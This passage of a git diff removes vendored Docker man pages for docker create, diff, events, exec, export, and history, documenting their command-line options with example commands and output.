point. - -The initial status of the container created with **docker create** is 'created'. - -# OPTIONS -**-a**, **--attach**=[] - Attach to STDIN, STDOUT or STDERR. - -**--add-host**=[] - Add a custom host-to-IP mapping (host:ip) - -**--blkio-weight**=*0* - Block IO weight (relative weight) accepts a weight value between 10 and 1000. - -**--blkio-weight-device**=[] - Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). - -**--cpu-shares**=*0* - CPU shares (relative weight) - -**--cap-add**=[] - Add Linux capabilities - -**--cap-drop**=[] - Drop Linux capabilities - -**--cgroup-parent**="" - Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist. - -**--cidfile**="" - Write the container ID to the file - -**--cpu-count**=*0* - Limit the number of CPUs available for execution by the container. - - On Windows Server containers, this is approximated as a percentage of total CPU usage. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-percent**=*0* - Limit the percentage of CPU available for execution by a container running on a Windows daemon. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-period**=*0* - Limit the CPU CFS (Completely Fair Scheduler) period - - Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. - -**--cpuset-cpus**="" - CPUs in which to allow execution (0-3, 0,1) - -**--cpuset-mems**="" - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. - - If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` -then processes in your Docker container will only use memory from the first -two memory nodes. - -**--cpu-quota**=*0* - Limit the CPU CFS (Completely Fair Scheduler) quota - -**--cpu-rt-period**=0 - Limit the CPU real-time period in microseconds - - Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. - -**--cpu-rt-runtime**=0 - Limit the CPU real-time runtime in microseconds - - Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: - Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. - - The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. - -**--cpus**=0.0 - Number of CPUs. The default is *0.0*. - -**--device**=[] - Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm) - -**--device-read-bps**=[] - Limit read rate (bytes per second) from a device (e.g. --device-read-bps=/dev/sda:1mb) - -**--device-read-iops**=[] - Limit read rate (IO per second) from a device (e.g. --device-read-iops=/dev/sda:1000) - -**--device-write-bps**=[] - Limit write rate (bytes per second) to a device (e.g. --device-write-bps=/dev/sda:1mb) - -**--device-write-iops**=[] - Limit write rate (IO per second) to a device (e.g. --device-write-iops=/dev/sda:1000) - -**--dns**=[] - Set custom DNS servers - -**--dns-option**=[] - Set custom DNS options - -**--dns-search**=[] - Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain) - -**-e**, **--env**=[] - Set environment variables - -**--entrypoint**="" - Overwrite the default ENTRYPOINT of the image - -**--env-file**=[] - Read in a line-delimited file of environment variables - -**--expose**=[] - Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host - -**--group-add**=[] - Add additional groups to run as - -**-h**, **--hostname**="" - Container host name - -**--help** - Print usage statement - -**-i**, **--interactive**=*true*|*false* - Keep STDIN open even if not attached. The default is *false*. - -**--ip**="" - Sets the container's interface IPv4 address (e.g. 172.23.0.9) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ip6**="" - Sets the container's interface IPv6 address (e.g. 2001:db8::1b99) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ipc**="" - Default is to create a private IPC namespace (POSIX SysV IPC) for the container - 'container:': reuses another container shared memory, semaphores and message queues - 'host': use the host shared memory,semaphores and message queues inside the container. Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. Note -that the default on Windows server is `process`, and the default on Windows client -is `hyperv`. Linux only supports `default`. - -**--kernel-memory**="" - Kernel memory limit (format: `[]`, where unit = b, k, m or g) - - Constrains the kernel memory available to a container. If a limit of 0 -is specified (not using `--kernel-memory`), the container's kernel memory -is not limited. If you specify a limit, it may be rounded up to a multiple -of the operating system's page size and the value can be very large, -millions of trillions. - -**-l**, **--label**=[] - Adds metadata to a container (e.g., --label=com.example.key=value) - -**--label-file**=[] - Read labels from a file. Delimit each label with an EOL. - -**--link**=[] - Add link to another container in the form of :alias or just - in which case the alias will match the name. - -**--link-local-ip**=[] - Add one or more link-local IPv4/IPv6 addresses to the container's interface - -**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" - Logging driver for the container. Default is defined by daemon `--log-driver` flag. - **Warning**: the `docker logs` command works only for the `json-file` and - `journald` logging drivers. - -**--log-opt**=[] - Logging driver specific options. - -**-m**, **--memory**="" - Memory limit (format: [], where unit = b, k, m or g) - - Allows you to constrain the memory available to a container. If the host -supports swap memory, then the **-m** memory setting can be larger than physical -RAM. If a limit of 0 is specified (not using **-m**), the container's memory is -not limited. The actual limit may be rounded up to a multiple of the operating -system's page size (the value would be very large, that's millions of trillions). - -**--mac-address**="" - Container MAC address (e.g. 92:d0:c6:0a:29:33) - -**--memory-reservation**="" - Memory soft limit (format: [], where unit = b, k, m or g) - - After setting memory reservation, when the system detects memory contention -or low memory, containers are forced to restrict their consumption to their -reservation. So you should always set the value below **--memory**, otherwise the -hard limit will take precedence. By default, memory reservation will be the same -as memory limit. - -**--memory-swap**="LIMIT" - A limit value equal to memory plus swap. Must be used with the **-m** -(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** -(**--memory**) value. - - The format of `LIMIT` is `[]`. Unit can be `b` (bytes), -`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a -unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. - -**--memory-swappiness**="" - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. - -**--name**="" - Assign a name to the container - -**--network**="*bridge*" - Set the Network mode for the container - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. - '|': connect to a user-defined network - -**--network-alias**=[] - Add network-scoped alias for the container - -**--oom-kill-disable**=*true*|*false* - Whether to disable OOM Killer for the container or not. - -**--oom-score-adj**="" - Tune the host's OOM preferences for containers (accepts -1000 to 1000) - -**-P**, **--publish-all**=*true*|*false* - Publish all exposed ports to random ports on the host interfaces. The default is *false*. - -**-p**, **--publish**=[] - Publish a container's port, or a range of ports, to the host - format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort - Both hostPort and containerPort can be specified as a range of ports. - When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. (e.g., `-p 1234-1236:1234-1236/tcp`) - (use 'docker port' to see the actual mapping) - -**--pid**="" - Set the PID mode for the container - Default is to create a private PID namespace for the container - 'container:': join another container's PID namespace - 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. - -**--userns**="" - Set the usernamespace mode for the container when `userns-remap` option is enabled. - **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`). - -**--pids-limit**="" - Tune the container's pids limit. Set `-1` to have unlimited pids for the container. - -**--privileged**=*true*|*false* - Give extended privileges to this container. The default is *false*. - -**--read-only**=*true*|*false* - Mount the container's root filesystem as read only. - -**--restart**="*no*" - Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). - -**--rm**=*true*|*false* - Automatically remove the container when it exits. The default is *false*. - -**--shm-size**="" - Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. - If you omit the size entirely, the system uses `64m`. - -**--security-opt**=[] - Security Options - - "label:user:USER" : Set the label user for the container - "label:role:ROLE" : Set the label role for the container - "label:type:TYPE" : Set the label type for the container - "label:level:LEVEL" : Set the label level for the container - "label:disable" : Turn off label confinement for the container - "no-new-privileges" : Disable container processes from gaining additional privileges - "seccomp:unconfined" : Turn off seccomp confinement for the container - "seccomp:profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter - -**--storage-opt**=[] - Storage driver options per container - - $ docker create -it --storage-opt size=120G fedora /bin/bash - - This (size) will allow to set the container rootfs size to 120G at creation time. - This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. - For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. - For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option. - Under these conditions, user can pass any size less then the backing fs size. - -**--stop-signal**=*SIGTERM* - Signal to stop a container. Default is SIGTERM. - -**--stop-timeout**=*10* - Timeout (in seconds) to stop a container. Default is 10. - -**--sysctl**=SYSCTL - Configure namespaced kernel parameters at runtime - - IPC Namespace - current sysctls allowed: - - kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced - Sysctls beginning with fs.mqueue.* - - Note: if you use --ipc=host using these sysctls will not be allowed. - - Network Namespace - current sysctls allowed: - Sysctls beginning with net.* - - Note: if you use --network=host using these sysctls will not be allowed. - -**-t**, **--tty**=*true*|*false* - Allocate a pseudo-TTY. The default is *false*. - -**--tmpfs**=[] Create a tmpfs mount - - Mount a temporary filesystem (`tmpfs`) mount into a container, for example: - - $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image - - This command mounts a `tmpfs` at `/tmp` within the container. The supported mount -options are the same as the Linux default `mount` flags. If you do not specify -any options, the systems uses the following options: -`rw,noexec,nosuid,nodev,size=65536k`. - -**-u**, **--user**="" - Sets the username or UID used and optionally the groupname or GID for the specified command. - - The followings examples are all valid: - --user [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Without this argument root user will be used in the container by default. - -**--ulimit**=[] - Ulimit options - -**--uts**=*host* - Set the UTS mode for the container - **host**: use the host's UTS namespace inside the container. - Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. - -**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*] - Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker - bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker - container. If 'HOST-DIR' is omitted, Docker automatically creates the new - volume on the host. The `OPTIONS` are a comma delimited list and can be: - - * [rw|ro] - * [z|Z] - * [`[r]shared`|`[r]slave`|`[r]private`] - -The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR` -can be an absolute path or a `name` value. A `name` value must start with an -alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or -`-` (hyphen). An absolute path starts with a `/` (forward slash). - -If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the -path you specify. If you supply a `name`, Docker creates a named volume by that -`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR` -value. If you supply the `/foo` value, Docker creates a bind-mount. If you -supply the `foo` specification, Docker creates a named volume. - -You can specify multiple **-v** options to mount one or more mounts to a -container. To use these same mounts in other containers, specify the -**--volumes-from** option also. - -You can add `:ro` or `:rw` suffix to a volume to mount it read-only or -read-write mode, respectively. By default, the volumes are mounted read-write. -See examples. - -Labeling systems like SELinux require that proper labels are placed on volume -content mounted into a container. Without a label, the security system might -prevent the processes running inside the container from using the content. By -default, Docker does not change the labels set by the OS. - -To change a label in the container context, you can add either of two suffixes -`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file -objects on the shared volumes. The `z` option tells Docker that two containers -share the volume content. As a result, Docker labels the content with a shared -content label. Shared volume labels allow all containers to read/write content. -The `Z` option tells Docker to label the content with a private unshared label. -Only the current container can use a private volume. - -By default bind mounted volumes are `private`. That means any mounts done -inside container will not be visible on host and vice-a-versa. One can change -this behavior by specifying a volume mount propagation property. Making a -volume `shared` mounts done under that volume inside container will be -visible on host and vice-a-versa. Making a volume `slave` enables only one -way mount propagation and that is mounts done on host under that volume -will be visible inside container but not the other way around. - -To control mount propagation property of volume one can use `:[r]shared`, -`:[r]slave` or `:[r]private` propagation flag. Propagation property can -be specified only for bind mounted volumes and not for internal volumes or -named volumes. For mount propagation to work source mount point (mount point -where source dir is mounted on) has to have right propagation properties. For -shared volumes, source mount point has to be shared. And for slave volumes, -source mount has to be either shared or slave. - -Use `df ` to figure out the source mount and then use -`findmnt -o TARGET,PROPAGATION ` to figure out propagation -properties of source mount. If `findmnt` utility is not available, then one -can look at mount entry for source mount point in `/proc/self/mountinfo`. Look -at `optional fields` and see if any propagaion properties are specified. -`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if -nothing is there that means mount is `private`. - -To change propagation properties of a mount point use `mount` command. For -example, if one wants to bind mount source directory `/foo` one can do -`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This -will convert /foo into a `shared` mount point. Alternatively one can directly -change propagation properties of source mount. Say `/` is source mount for -`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount. - -> **Note**: -> When using systemd to manage the Docker daemon's start and stop, in the systemd -> unit file there is an option to control mount propagation for the Docker daemon -> itself, called `MountFlags`. The value of this setting may cause Docker to not -> see mount propagation changes made on the mount point. For example, if this value -> is `slave`, you may not be able to use the `shared` or `rshared` propagation on -> a volume. - - -To disable automatic copying of data from the container path to the volume, use -the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes. - -**--volume-driver**="" - Container's volume driver. This driver creates volumes specified either from - a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag. - See **docker-volume-create(1)** for full details. - -**--volumes-from**=[] - Mount volumes from the specified container(s) - -**-w**, **--workdir**="" - Working directory inside the container - -# EXAMPLES - -## Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - -* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. -* `process`: Namespace isolation only. -* `hyperv`: Hyper-V hypervisor partition-based isolation. - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. - -# HISTORY -August 2014, updated by Sven Dowideit -September 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-diff.1.md b/vendor/github.com/docker/docker/man/docker-diff.1.md deleted file mode 100644 index 6c6c502533..0000000000 --- a/vendor/github.com/docker/docker/man/docker-diff.1.md +++ /dev/null @@ -1,49 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-diff - Inspect changes on a container's filesystem - -# SYNOPSIS -**docker diff** -[**--help**] -CONTAINER - -# DESCRIPTION -Inspect changes on a container's filesystem. You can use the full or -shortened container ID or the container name set using -**docker run --name** option. - -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES -Inspect the changes to on a nginx container: - - # docker diff 1fdfd1f54c1b - C /dev - C /dev/console - C /dev/core - C /dev/stdout - C /dev/fd - C /dev/ptmx - C /dev/stderr - C /dev/stdin - C /run - A /run/nginx.pid - C /var/lib/nginx/tmp - A /var/lib/nginx/tmp/client_body - A /var/lib/nginx/tmp/fastcgi - A /var/lib/nginx/tmp/proxy - A /var/lib/nginx/tmp/scgi - A /var/lib/nginx/tmp/uwsgi - C /var/log/nginx - A /var/log/nginx/access.log - A /var/log/nginx/error.log - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-events.1.md b/vendor/github.com/docker/docker/man/docker-events.1.md deleted file mode 100644 index 51b042775a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-events.1.md +++ /dev/null @@ -1,180 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-events - Get real time events from the server - -# SYNOPSIS -**docker events** -[**--help**] -[**-f**|**--filter**[=*[]*]] -[**--since**[=*SINCE*]] -[**--until**[=*UNTIL*]] -[**--format**[=*FORMAT*]] - - -# DESCRIPTION -Get event information from the Docker daemon. Information can include historical -information and real-time information. - -Docker containers will report the following events: - - attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update - -Docker images report the following events: - - delete, import, load, pull, push, save, tag, untag - -Docker volumes report the following events: - - create, mount, unmount, destroy - -Docker networks report the following events: - - create, connect, disconnect, destroy - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--filter**=[] - Filter output based on these conditions - - container (`container=`) - - event (`event=`) - - image (`image=`) - - plugin (experimental) (`plugin=`) - - label (`label=` or `label==`) - - type (`type=`) - - volume (`volume=`) - - network (`network=`) - - daemon (`daemon=`) - -**--since**="" - Show all events created since timestamp - -**--until**="" - Stream events until this timestamp - -**--format**="" - Format the output using the given Go template - -The `--since` and `--until` parameters can be Unix timestamps, date formatted -timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed -relative to the client machine's time. If you do not provide the `--since` option, -the command returns only new and/or live events. Supported formats for date -formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. - -# EXAMPLES - -## Listening for Docker events - -After running docker events a container 786d698004576 is started and stopped -(The container name has been shortened in the output below): - - # docker events - 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) start - 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) die - 2015-01-28T20:21:32.000000000-08:00 59211849bc10: (from whenry/testimage:latest) stop - -## Listening for events since a given date -Again the output container IDs have been shortened for the purposes of this document: - - # docker events --since '2015-01-28' - 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create - 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start - 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create - 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start - 2015-01-28T20:25:40.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die - 2015-01-28T20:25:42.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop - 2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start - 2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die - 2015-01-28T20:25:46.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop - -The following example outputs all events that were generated in the last 3 minutes, -relative to the current time on the client machine: - - # docker events --since '3m' - 2015-05-12T11:51:30.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) die - 2015-05-12T15:52:12.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) stop - 2015-05-12T15:53:45.999999999Z07:00 7805c1d35632: (from redis:2.8) die - 2015-05-12T15:54:03.999999999Z07:00 7805c1d35632: (from redis:2.8) stop - -If you do not provide the --since option, the command returns only new and/or -live events. - -## Format - -If a format (`--format`) is specified, the given template will be executed -instead of the default format. Go's **text/template** package describes all the -details of the format. - - # docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' - Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - -If a format is set to `{{json .}}`, the events are streamed as valid JSON -Lines. For information about JSON Lines, please refer to http://jsonlines.org/ . - - # docker events --format '{{json .}}' - {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. - {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. - {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - -## Filters - - $ docker events --filter 'event=stop' - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'image=ubuntu-1:14.04' - 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - - $ docker events --filter 'container=7805c1d35632' - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' - 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'type=volume' - 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) - 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) - 2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) - 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) - - $ docker events --filter 'type=network' - 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) - 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) - - $ docker events --filter 'type=plugin' (experimental) - 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -June 2015, updated by Brian Goff -October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-exec.1.md b/vendor/github.com/docker/docker/man/docker-exec.1.md deleted file mode 100644 index fe9c279e7e..0000000000 --- a/vendor/github.com/docker/docker/man/docker-exec.1.md +++ /dev/null @@ -1,71 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-exec - Run a command in a running container - -# SYNOPSIS -**docker exec** -[**-d**|**--detach**] -[**--detach-keys**[=*[]*]] -[**-e**|**--env**[=*[]*]] -[**--help**] -[**-i**|**--interactive**] -[**--privileged**] -[**-t**|**--tty**] -[**-u**|**--user**[=*USER*]] -CONTAINER COMMAND [ARG...] - -# DESCRIPTION - -Run a process in a running container. - -The command started using `docker exec` will only run while the container's primary -process (`PID 1`) is running, and will not be restarted if the container is restarted. - -If the container is paused, then the `docker exec` command will wait until the -container is unpaused, and then run - -# OPTIONS -**-d**, **--detach**=*true*|*false* - Detached mode: run command in the background. The default is *false*. - -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**-e**, **--env**=[] - Set environment variables - - This option allows you to specify arbitrary environment variables that are -available for the command to be executed. - -**--help** - Print usage statement - -**-i**, **--interactive**=*true*|*false* - Keep STDIN open even if not attached. The default is *false*. - -**--privileged**=*true*|*false* - Give the process extended [Linux capabilities](http://man7.org/linux/man-pages/man7/capabilities.7.html) -when running in a container. The default is *false*. - - Without this flag, the process run by `docker exec` in a running container has -the same capabilities as the container, which may be limited. Set -`--privileged` to give all capabilities to the process. - -**-t**, **--tty**=*true*|*false* - Allocate a pseudo-TTY. The default is *false*. - -**-u**, **--user**="" - Sets the username or UID used and optionally the groupname or GID for the specified command. - - The followings examples are all valid: - --user [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Without this argument the command will be run as root in the container. - -The **-t** option is incompatible with a redirection of the docker client -standard input. - -# HISTORY -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-export.1.md b/vendor/github.com/docker/docker/man/docker-export.1.md deleted file mode 100644 index 3d59e4788e..0000000000 --- a/vendor/github.com/docker/docker/man/docker-export.1.md +++ /dev/null @@ -1,46 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-export - Export the contents of a container's filesystem as a tar archive - -# SYNOPSIS -**docker export** -[**--help**] -[**-o**|**--output**[=*""*]] -CONTAINER - -# DESCRIPTION -Export the contents of a container's filesystem using the full or shortened -container ID or container name. The output is exported to STDOUT and can be -redirected to a tar file. - -Stream to a file instead of STDOUT by using **-o**. - -# OPTIONS -**--help** - Print usage statement - -**-o**, **--output**="" - Write to a file, instead of STDOUT - -# EXAMPLES -Export the contents of the container called angry_bell to a tar file -called angry_bell.tar: - - # docker export angry_bell > angry_bell.tar - # docker export --output=angry_bell-latest.tar angry_bell - # ls -sh angry_bell.tar - 321M angry_bell.tar - # ls -sh angry_bell-latest.tar - 321M angry_bell-latest.tar - -# See also -**docker-import(1)** to create an empty filesystem image -and import the contents of the tarball into it, then optionally tag it. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -January 2015, updated by Joseph Kern (josephakern at gmail dot com) diff --git a/vendor/github.com/docker/docker/man/docker-history.1.md b/vendor/github.com/docker/docker/man/docker-history.1.md deleted file mode 100644 index 91edefe25f..0000000000 --- a/vendor/github.com/docker/docker/man/docker-history.1.md +++ /dev/null @@ -1,52 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-history - Show the history of an image - -# SYNOPSIS -**docker history** -[**--help**] -[**-H**|**--human**[=*true*]] -[**--no-trunc**] -[**-q**|**--quiet**] -IMAGE - -# DESCRIPTION - -Show the history of when and how an image was created. - -# OPTIONS -**--help** - Print usage statement - -**-H**, **--human**=*true*|*false* - Print sizes and dates in human readable format. The default is *true*. - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Only show numeric IDs. The default is *false*. - -# EXAMPLES - $ docker history fedora - IMAGE CREATED CREATED BY SIZE COMMENT - 105182bb5e8b 5 days ago /bin/sh -c #(nop) ADD file:71356d2ad59aa3119d 372.7 MB - 73bd853d2ea5 13 days ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B - 511136ea3c5a 10 months ago 0 B Imported from - - -## Display comments in the image history -The `docker commit` command has a **-m** flag for adding comments to the image. These comments will be displayed in the image history. - - $ sudo docker history docker:scm - IMAGE CREATED CREATED BY SIZE COMMENT - 2ac9d1098bf1 3 months ago /bin/bash 241.4 MB Added Apache to Fedora base image - 88b42ffd1f7c 5 months ago /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7 373.7 MB - c69cab00d6ef 5 months ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B - 511136ea3c5a 19 months ago 0 B Imported from - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-images.1.md b/vendor/github.com/docker/docker/man/docker-images.1.md deleted file mode 100644 index d7958d0dc4..0000000000 --- a/vendor/github.com/docker/docker/man/docker-images.1.md +++ /dev/null @@ -1,153 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-images - List images - -# 